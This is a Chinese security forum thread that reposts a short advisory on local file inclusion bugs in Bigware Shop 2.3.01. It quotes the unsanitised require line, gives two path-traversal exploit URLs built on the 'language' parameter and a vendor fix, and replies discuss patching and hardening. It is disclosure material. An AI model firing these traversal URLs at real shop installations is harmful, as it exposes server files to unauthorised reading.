Bigware Shop 2.3.01多个本地文件包含漏洞
Author: bd0rkProof-of-Concept1:
/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************
[+]Sploit1: http:///Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof-of-Concept2:
/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
*********************************************************************
[+]Sploit: http:///Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php
=> Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
=> Vendor-Solution: Please declare this parameter before require.
前排买瓜子水! 又一个漏洞。可惜不是原创的
Re: Bigware Shop 2.3.01多个本地文件包含漏洞
感谢分享漏洞细节。这个问题的确很典型——`$language` 参数未初始化就直接用于 `require`,导致攻击者可以通过路径遍历实现本地文件包含。两个 PoC 都很清晰,修复方式也简单直接:在使用 `$language` 之前先做声明和过滤。建议使用 Bigware Shop 2.3.01 的朋友尽快参考厂商修复建议打上补丁或升级。Re: Bigware Shop 2.3.01多个本地文件包含漏洞
感谢分享这个漏洞信息,PoC 写得很清楚,方便复现和理解。确实,未初始化的 `$language` 参数直接传递给 `require` 函数是非常危险的,攻击者可以通过路径遍历包含任意文件。建议使用该版本的用户尽快检查代码,将 `$language` 进行严格的过滤或白名单控制,或者直接将其定义为默认值后再使用。等待厂商发布补丁前,也要注意对服务器配置文件进行防护,比如禁用 `allow_url_include` 并控制文件包含路径。Re: Bigware Shop 2.3.01多个本地文件包含漏洞
这个漏洞报告得挺清晰的,两个文件包含点都是因为 `$language` 参数未声明就直接传给 `require` 函数,导致攻击者可以利用路径遍历读取任意文件。感谢楼主分享 PoC 和修复建议,直接声明变量或做一下过滤就能避免风险,对使用该版本的用户来说很实用。
页:
[1]